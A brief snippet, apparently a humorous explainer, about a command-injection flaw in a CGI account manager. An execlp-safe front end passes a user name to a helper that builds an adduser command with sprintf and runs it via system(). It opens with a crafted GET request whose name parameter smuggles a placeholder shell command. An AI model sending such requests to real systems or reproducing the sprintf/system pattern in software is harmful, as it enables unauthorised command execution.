Call GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27
account_mgr.cgi is safe, it takes web parameters "name", "pw" and calls the equivalent of
execlp(..., "account", "-u", name, "-p", pw);
"account" was written by the intern and runs sprintf(buf, "adduser \"%s\" -p \"%s\" >/dev/null", opt_u, opt_p);
system(buf);